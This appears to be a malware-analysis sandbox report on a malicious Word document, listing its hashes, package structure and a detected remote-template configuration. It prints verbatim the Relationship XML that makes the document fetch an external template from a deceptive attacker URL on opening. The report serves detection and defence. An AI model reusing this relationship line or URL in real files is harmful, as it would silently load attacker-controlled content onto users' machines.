Malicious
Malicious

5bdcf7d885f8b8e20dc16d72b1326a12

MS Word Document
|
MD5: 5bdcf7d885f8b8e20dc16d72b1326a12
|
Size: 184.86 KB
|
application/msword

Print
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
5bdcf7d885f8b8e20dc16d72b1326a12
Sha1
4e88163ecec41c1b44f0e807ac453989ee7225da
Sha256
4a4b392d95ca2f8828bcf1addd824f554471e777cdb26dfe40f497b2d8201f2f
Sha384
d602cc13ca255c60f333c7c30ac99d09c0f6f2ce1dddd99db6e86893cf42b10bf60d39b6805cfab7e94ac81b636567c1
Sha512
f7df37487b2ffdfe621ebf7ac439fec1d3802fbcff1693cac5bd4bb086f2db1ffe01dc175a0e4979ea66bac5b51331d7424169189002c6e328417075d4cd764d
SSDeep
3072:g+HLrxibi6mmnm/mhfHVxibi6ma817FFL+Ceb:g+H5lmme/la817FFL+Co
TLSH
9E041230CC41254BE1DB76721FA16A48ED4C4A02D56F014C4DB22A97BEEBED3EE85E47
File Structure
5bdcf7d885f8b8e20dc16d72b1326a12
Malicious
[Content_Types].xml
_rels
.rels
word
Malicious
_rels
Malicious
document.xml.rels
header2.xml.rels
footer2.xml.rels
settings.xml.rels
Malicious
document.xml
footnotes.xml
footer2.xml
footer3.xml
header3.xml
endnotes.xml
header2.xml
media
image1.emf
image2.emf
embeddings
Microsoft_Office_Excel_Worksheet1.xlsx
[Content_Types].xml
_rels
.rels
xl
_rels
workbook.xml.rels
workbook.xml
sharedStrings.xml
worksheets
_rels
sheet1.xml.rels
sheet1.xml
theme
theme1.xml
styles.xml
drawings
vmlDrawing1.vml
printerSettings
printerSettings1.bin
comments1.xml
docProps
thumbnail.wmf
core.xml
app.xml
Microsoft_Office_Excel_Worksheet2.xlsx
docProps
thumbnail.wmf
core.xml
theme
theme1.xml
settings.xml
styles.xml
webSettings.xml
fontTable.xml
docProps
app.xml
core.xml
Malware Configuration - Remote Template
Config. Field
 Value
Target

https://bestpeopelskingfortheempireworldbestthingstobefgoodandgreatstobebest.Docx@st3.pro/L4A6rzm
Path

settings.xml.rels
XPath

/Relationships/Relationship
Outer XML

<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="https://bestpeopelskingfortheempireworldbestthingstobefgoodandgreatstobebest.Docx@st3.pro/L4A6rzm" TargetMode="External" xmlns="http://schemas.openxmlformats.org/package/2006/relationships" />
Artefacts
Name
 Value
Remote Template - Highly Suspicious

https://bestpeopelskingfortheempireworldbestthingstobefgoodandgreatstobebest.Docx@st3.pro/L4A6rzm
5bdcf7d885f8b8e20dc16d72b1326a12 (184.86 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙